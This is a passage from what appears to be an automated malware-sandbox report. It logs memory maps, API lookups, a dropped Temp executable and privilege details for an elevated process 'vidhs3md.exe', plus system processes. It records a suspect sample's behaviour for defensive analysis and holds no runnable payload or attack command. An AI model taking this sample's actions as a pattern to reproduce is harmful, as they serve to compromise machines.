| private_0x0000000280410000 | 0x280410000 | 0x28042ffff | Private Memory | rw |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #32: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #32 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "jnwdui.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:41, Reason: Child Process |
| Unmonitor | End Time: 00:04:23, Reason: Self Terminated |
| Monitor Duration | 00:00:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed4 |
| Parent PID | 0x190 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EC8
0x
DC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x002edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00710000 | 0x00739fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00890fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x01cdffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01e0ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:07:56 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #33: smss.exe
0
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\system32\smss.exe |
| Command Line | \SystemRoot\System32\smss.exe |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x108 |
| Parent PID | 0x4 (System) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
2AC
0x
114
0x
10C
|
Process #34: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x154 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
4B0
0x
32C
0x
1DC
